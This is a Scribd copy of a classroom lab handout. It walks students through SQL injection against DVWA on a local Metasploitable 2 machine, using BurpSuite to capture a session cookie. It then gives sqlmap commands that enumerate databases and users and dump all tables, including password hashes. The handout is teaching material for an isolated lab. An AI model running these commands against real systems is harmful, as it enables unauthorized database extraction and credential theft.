Scribd
Upload
34 views

SQLMAP Lab - 2 Virtual Machine Option

Uploaded by

shulerspencer
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
34 views

SQLMAP Lab - 2 Virtual Machine Option

Uploaded by

shulerspencer
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 11

SQLMAP Lab - SQL Injection Lab with DVWA within Metasploitable 2

Steps for the SQL Injection Lab. This option is for having 2 virtual machines both running.

A) Download the Metasploitable2 Virtual Machine and run it locally. You will need to have your Kali Linux
and Metasploitable 2 running (Resource could be an issue for some)

1) If resource is NOT a problem then download the file on this link

2) Import appliance - Make sure you uncheck the USB port and REINITIALIZE the network card and also
BRIDGE your network adapter

3) Start up the Metasploitable 2 virtual machine

4) Login with the following username: msfadmin password: msfadmin

5) Find out the IP address of your Metasploitable 2 machine by opening a terminal and typing: ifconfig

6) Once you find out your IP address, write it down

7) Power on your Kali Linux virtual machine and login

8) Open a Firefox Browser and type in the IP address of your Metasploitable 2 virtual machine, select DVWA
and login with the username: admin password: password
Once logged in, select DVWA Security and set the security to low for this test and press the Submit button.
Then select SETUP and CREATE / RESET DATABASE, this will create the databases for us to attack.
9) From Kali Linux open up the Firefox browser and click on the 3 lines and select Preferences
10) Click on Settings and follow the setup below and click the OK button.

Next is setting up BurpSuite


11) Click on the BurpSuite icon and click the OK button

12) Click the I Accept button.


13) Select Temporary project and click the Next button.

14) Click the Start Burp button.


15) Click the Proxy Tab and the select Intercept Tab, make sure you click the button to have Intercept On

16) Go back to the DWVA login link and type in the username and password and click the Login button.
As the Firefox Browser routes the traffic to BurpSuite, you will see that a session cookie was captured.
Make sure you have this session cookie as this will be the key to our next step with the SQLMap application
inside Kali Linux.
17) Once you have the session cookie, you can go back to your Firefox Browser | Preferences and select No
proxy option and click OK as we will no longer need to intercept the network traffic.

18) Next we will click on a Terminal session inside Kali Linux and type the word sqlmap which will bring up the
SQLMap application.

19) Make sure you have your session cookie from BurpSuite as we will use it now for the SQL Injection attack.
For my session, the cookie is: security=low; PHPSESSID=eb3d1ecc9aaa0f8d478e66e9ce6f1738
Now that we have our cookie value, let’s revisit the SQLMap injection scheme.

Example of sqlmap command to type: YOUR IP ADDRESS and COOKIE VALUE will be different

Link to SQLMAP commands: https://github.com/sqlmapproject/sqlmap/wiki/Usage

******* In front of the cookie and dbs word are two - - making it look like -- **********

sqlmap -u "http://192.168.1.24/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;


PHPSESSID=eb3d1ecc9aaa0f8d478e66e9ce6f1738" --dbs

SQLMAP will ask you a bunch of questions, just click Y and enter and it will go all the way to the end. You should see this
screen when it is done. Look at the available databases.
We will then try to enumerate tables in one of the databases.
Sqlmap command example below: IP ADDRESS and COOKIE VALUE are different for your command

sqlmap -u "http://192.168.1.24/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;


PHPSESSID=eb3d1ecc9aaa0f8d478e66e9ce6f1738" -D dvwa --tables

We can view who is the current user with the following command: IP ADDRESS and COOKIE VALUE are different

sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;


PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --current-user

We can list all the database users:

sqlmap -u "http://192.168.1.24/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;


PHPSESSID=eb3d1ecc9aaa0f8d478e66e9ce6f1738" --users
We can dump all the tables for this database and crack the hash to retrieve the passwords as well.

sqlmap -u "http://192.168.1.24/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;


PHPSESSID=eb3d1ecc9aaa0f8d478e66e9ce6f1738" -D dvwa --dump-all

Submit the following:

Upload a word document with the screenshots of your SQL Injection Lab from SQL MAP.

Your word document must contain the screenshots of the following:

1) Your unique session cookie from BurpSuite.

2) Your results from your SQL Map output of running all the commands from the handout with your session cookie.

You might also like